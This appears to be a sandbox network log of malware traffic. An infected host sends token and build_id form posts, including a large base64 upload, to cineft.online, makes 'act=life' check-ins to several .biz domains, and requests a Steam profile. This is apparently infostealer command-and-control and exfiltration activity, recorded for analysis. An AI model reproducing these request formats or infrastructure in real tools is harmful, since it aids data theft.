2024-12-14 23:00:17 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----MYC2DT2NGVAIEUKFKXLN User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:17 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 59 43 32 44 54 32 4e 47 56 41 49 45 55 4b 46 4b 58 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 43 32 44 54 32 4e 47 56 41 49 45 55 4b 46 4b 58 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 43 32 44 54 32 4e 47 56 41 49 45 55 4b 46 4b 58 4c 4e 0d 0a 43 6f 6e 74 Data Ascii: ------MYC2DT2NGVAIEUKFKXLNContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------MYC2DT2NGVAIEUKFKXLNContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MYC2DT2NGVAIEUKFKXLNCont
2024-12-14 23:00:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:18 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	50172	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:18 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----79H47YUK6F3EU3O890R1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:18 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 39 48 34 37 59 55 4b 36 46 33 45 55 33 4f 38 39 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 37 39 48 34 37 59 55 4b 36 46 33 45 55 33 4f 38 39 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 39 48 34 37 59 55 4b 36 46 33 45 55 33 4f 38 39 30 52 31 0d 0a 43 6f 6e 74 Data Ascii: ------79H47YUK6F3EU3O890R1Content-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------79H47YUK6F3EU3O890R1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------79H47YUK6F3EU3O890R1Cont
2024-12-14 23:00:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:19 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	50173	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:20 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----XTRIWBAS0ZUAIECT0ZMG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:20 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 58 54 52 49 57 42 41 53 30 5a 55 41 49 45 43 54 30 5a 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 58 54 52 49 57 42 41 53 30 5a 55 41 49 45 43 54 30 5a 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 58 54 52 49 57 42 41 53 30 5a 55 41 49 45 43 54 30 5a 4d 47 0d 0a 43 6f 6e 74 Data Ascii: ------XTRIWBAS0ZUAIECT0ZMGContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------XTRIWBAS0ZUAIECT0ZMGContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------XTRIWBAS0ZUAIECT0ZMGCont
2024-12-14 23:00:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	50176	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:23 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----I58GVKXT2VAAIEUSR1VA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 83785 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:23 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 35 38 47 56 4b 58 54 32 56 41 41 49 45 55 53 52 31 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 49 35 38 47 56 4b 58 54 32 56 41 41 49 45 55 53 52 31 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 35 38 47 56 4b 58 54 32 56 41 41 49 45 55 53 52 31 56 41 0d 0a 43 6f 6e 74 Data Ascii: ------I58GVKXT2VAAIEUSR1VAContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------I58GVKXT2VAAIEUSR1VAContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------I58GVKXT2VAAIEUSR1VACont
2024-12-14 23:00:23 UTC	16355	OUT	Data Raw: 33 39 72 76 70 6a 65 66 35 58 32 47 39 53 37 2b 35 75 33 37 51 77 32 39 52 6a 4f 37 72 7a 30 36 56 71 30 55 55 75 6c 67 4f 65 6b 38 50 33 39 6e 71 46 7a 64 36 46 71 73 64 6d 74 32 35 6c 6e 74 72 6d 31 38 2b 49 79 45 41 46 31 41 64 47 55 6e 48 50 7a 45 48 72 6a 4e 57 74 49 30 52 72 47 37 75 4e 51 76 62 78 72 37 55 72 68 56 53 53 63 78 68 46 56 42 6b 68 45 51 5a 32 72 6b 6b 39 53 53 54 79 54 78 57 76 52 51 74 41 65 70 67 36 62 6f 4e 35 70 74 39 64 4b 6d 6f 51 79 61 56 63 7a 79 33 44 57 6b 6c 72 6d 51 4e 4a 6b 73 50 4d 33 34 32 37 69 54 6a 62 6e 6e 47 61 72 32 2f 68 37 57 74 4d 67 2b 77 36 56 34 67 69 69 30 39 52 74 68 6a 75 62 4c 7a 70 59 46 2f 75 71 2b 39 51 51 4f 32 35 57 78 37 31 30 31 46 41 47 50 65 61 45 31 35 61 36 58 43 39 2f 4b 37 32 4e 33 48 63 74 Data Ascii: 39rvpjef5X2G9S7+5u37Qw29RjO7rz06Vq0UUulgOek8P39nqFzd6Fqsdmt25lntrm18+IyEAF1AdGUnHPzEHrjNWtI0RrG7uNQvbxr7UrhVSScxhFVBkhEQZ2rkk9SSTyTxWvRQtAepg6boN5pt9dKmoQyaVczy3DWklrmQNJksPM3427iTjbnnGar2/h7WtMg+w6V4gii09RthjubLzpYF/uq+9QQO25Wx7101FAGPeaE15a6XC9/K72N3Hct
2024-12-14 23:00:23 UTC	16355	OUT	Data Raw: 50 48 48 6a 47 32 53 34 6e 6e 52 48 74 4e 72 54 79 6d 52 77 44 45 54 67 73 65 54 6a 50 55 6b 6e 47 4f 54 57 2b 2f 68 54 52 58 30 79 30 30 38 57 6a 4a 62 32 62 46 37 59 78 54 79 4a 4a 43 54 6e 4a 57 52 57 44 6a 4f 54 33 37 31 4c 70 48 68 33 53 74 43 6d 75 70 74 4f 74 6a 46 4c 64 6c 57 75 48 61 56 35 47 6c 4b 35 77 57 4c 45 6b 6e 6b 35 50 55 39 38 30 37 37 2f 77 42 64 66 36 51 4d 35 37 55 64 4b 74 37 6a 34 71 36 62 4b 38 6c 34 47 62 54 5a 35 43 49 37 32 5a 46 79 73 6b 49 41 77 72 41 41 65 71 39 44 33 42 72 4c 73 4e 4d 31 58 56 2f 43 2b 76 58 30 4f 73 61 6d 64 55 53 38 75 31 73 63 58 6b 67 52 42 48 4d 78 56 4e 67 59 4b 51 53 75 4d 6b 45 34 4f 4f 67 78 58 63 33 32 69 32 4f 6f 33 6c 72 65 58 43 53 69 35 74 53 66 4a 6c 68 6e 6b 69 59 41 34 4a 42 4b 4d 4e 79 6e Data Ascii: PHHjG2S4nnRHtNrTymRwDETgseTjPUknGOTW+/hTRX0y008WjJb2bF7YxTyJJCTnJWRWDjOT371LpHh3StCmuptOtjFLdlWuHaV5GlK5wWLEknk5PU98077/wBdf6QM57UdKt7j4q6bK8l4GbTZ5CI72ZFyskIAwrAAeq9D3BrLsNM1XV/C+vX0OsamdUS8u1scXkgRBHMxVNgYKQSuMkE4OOgxXc32i2Oo3lreXCSi5tSfJlhnkiYA4JBKMNyn
2024-12-14 23:00:23 UTC	16355	OUT	Data Raw: 50 4c 34 48 33 63 39 48 34 74 73 35 62 7a 77 70 4c 61 43 4a 37 6c 32 65 41 4f 69 49 57 4c 41 53 70 75 34 48 62 47 54 53 36 44 36 32 2f 72 2b 6d 58 5a 66 45 6d 68 51 57 4d 56 39 4c 72 57 6e 52 32 6b 7a 46 59 70 33 75 6b 45 62 73 4f 6f 56 73 34 4a 47 44 30 39 4b 6d 75 74 5a 30 75 78 6d 74 34 62 7a 55 72 4f 33 6c 75 54 69 42 4a 70 31 52 70 54 77 50 6c 42 50 7a 64 52 30 39 61 35 4c 58 72 53 36 74 76 47 44 58 30 74 31 72 46 74 59 53 32 43 32 38 4d 6d 6d 57 4b 58 57 78 67 37 46 30 5a 66 4b 6b 5a 51 77 4b 45 45 41 41 37 63 45 38 43 71 2f 32 4a 74 45 6e 30 31 4e 46 68 31 4f 53 35 2b 79 32 31 73 39 76 65 32 42 6b 69 6e 67 44 45 67 4e 4b 71 68 59 70 45 44 4e 31 49 48 51 62 54 78 54 56 6d 44 30 2f 72 30 4f 7a 6d 31 76 53 62 62 55 6f 39 4f 6e 31 53 79 69 76 70 4d 62 Data Ascii: PL4H3c9H4ts5bzwpLaCJ7l2eAOiIWLASpu4HbGTS6D62/r+mXZfEmhQWMV9LrWnR2kzFYp3ukEbsOoVs4JGD09KmutZ0uxmt4bzUrO3luTiBJp1RpTwPlBPzdR09a5LXrS6tvGDX0t1rFtYS2C28MmmWKXWxg7F0ZfKkZQwKEEAA7cE8Cq/2JtEn01NFh1OS5+y21s9ve2BkingDEgNKqhYpEDN1IHQbTxTVmD0/r0Ozm1vSbbUo9On1SyivpMb
2024-12-14 23:00:23 UTC	16355	OUT	Data Raw: 49 4f 4a 47 56 53 70 44 6e 4f 47 79 43 42 77 63 35 47 57 6d 6b 61 78 70 6b 6d 69 33 71 61 61 4c 78 34 62 6d 38 75 62 6d 43 47 5a 41 30 58 6e 6b 73 46 51 75 51 47 49 33 59 36 67 48 42 35 36 56 33 46 46 48 51 48 72 2f 58 79 4f 4c 69 30 58 56 4c 69 55 36 6a 4e 5a 65 52 4c 64 61 31 46 65 50 62 47 52 43 30 4d 4b 52 69 4d 46 69 43 51 57 49 55 45 68 53 66 76 59 35 78 56 4f 7a 38 4c 79 57 31 39 50 5a 33 32 6b 36 72 65 78 79 61 67 39 79 6c 33 48 71 37 70 62 46 57 6b 38 77 46 34 76 4e 47 47 55 6e 47 41 6a 41 6c 51 63 38 6e 48 6f 46 46 43 30 2f 72 30 58 36 41 39 66 36 39 66 38 7a 6a 72 6e 51 72 2b 54 52 4e 55 74 6c 74 51 5a 62 6a 57 6b 75 6b 58 65 76 7a 52 43 61 4e 69 33 58 2b 36 70 34 50 50 46 61 44 77 61 6c 5a 65 49 39 54 31 43 33 30 2f 77 43 30 78 33 45 56 6e 45 Data Ascii: IOJGVSpDnOGyCBwc5GWmkaxpkmi3qaaLx4bm8ubmCGZA0XnksFQuQGI3Y6gHB56V3FFHQHr/XyOLi0XVLiU6jNZeRLda1FePbGRC0MKRiMFiCQWIUEhSfvY5xVOz8LyW19PZ32k6rexyag9yl3Hq7pbFWk8wF4vNGGUnGAjAlQc8nHoFFC0/r0X6A9f69f8zjrnQr+TRNUtltQZbjWkukXevzRCaNi3X+6p4PPFaDwalZeI9T1C30/wC0x3EVnE
2024-12-14 23:00:23 UTC	2010	OUT	Data Raw: 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 Data Ascii: RRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFAB
2024-12-14 23:00:24 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:24 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	50178	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:26 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----79RQ1NOHDJMYMYU3ECBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:26 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------79RQ1NOHDJMYMYU3ECBAContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------79RQ1NOHDJMYMYU3ECBAContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------79RQ1NOHDJMYMYU3ECBACont
2024-12-14 23:00:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	50180	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:28 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----X47GLNO8GLN7QIM7Q9HD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:28 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 58 34 37 47 4c 4e 4f 38 47 4c 4e 37 51 49 4d 37 51 39 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 58 34 37 47 4c 4e 4f 38 47 4c 4e 37 51 49 4d 37 51 39 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 58 34 37 47 4c 4e 4f 38 47 4c 4e 37 51 49 4d 37 51 39 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------X47GLNO8GLN7QIM7Q9HDContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------X47GLNO8GLN7QIM7Q9HDContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------X47GLNO8GLN7QIM7Q9HDCont
2024-12-14 23:00:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	50279	104.21.50.161	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:03:56 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tacitglibbr.biz
2024-12-14 23:03:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 23:03:57 UTC	1014	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:03:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vdc6le5fl70m877j2ok1ltc6pb; expires=Wed, 09-Apr-2025 16:50:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gHW0JKuA3zSn22F4vvD18hlmWbtneJxhk1MZmWRluz2EI%2FXqQ98Y%2FoZrsqQpUjHZCeebfEBV%2FSoozFEhKJ5qLbVzQ86GnJQu9yNW%2BMMnXPzGE5yu4iYI51sLadybAOqNjKw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21d4825f1e42e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1571&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=906&delivery_rate=1819314&cwnd=232&unsent_bytes=0&cid=428f259fd7b039b0&ts=1011&x=0"
2024-12-14 23:03:57 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 23:03:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	50283	172.67.207.38	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:03:58 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-14 23:03:58 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 23:03:59 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:03:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=in9ifv26plfnbhtr738og072tb; expires=Wed, 09-Apr-2025 16:50:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=roIulbh%2BdZWe9HykZQZ99bcvPitIdKlU3BpOu3EljvUw73NeY7a1gHlpykQNj2Dw3oHEJ7tZZqFuKEkvI6LrQCR0OTxZCnsOWmSqY%2BsVD8fy4YpaPXXVe%2F28V4O5bun8xqE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21d49138b24332-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=2058&rtt_var=793&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1361940&cwnd=113&unsent_bytes=0&cid=5abdfc35f9e1eeb7&ts=746&x=0"
2024-12-14 23:03:59 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 23:03:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	50284	104.21.64.1	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:04:00 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-14 23:04:00 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 23:04:01 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7ukc8srallc3v50j24lvf90lsl; expires=Wed, 09-Apr-2025 16:50:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tK4HCnDchP5s%2B2%2Fh3zhV3bQjDSqcRO0%2BS5Wo3qro0LSulvevrFxIiPPGRRy706jS5c5PojJzSyaQGNMAQGS0WJIgKe2pXFL3ySalxDhXNALCUXvIWyfCV4xVxNYwzJy%2BBWot"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21d49e8abe4414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1804&rtt_var=679&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1618625&cwnd=172&unsent_bytes=0&cid=8d243f86d0b88976&ts=738&x=0"
2024-12-14 23:04:01 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 23:04:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	50288	104.102.49.254	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:04:03 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
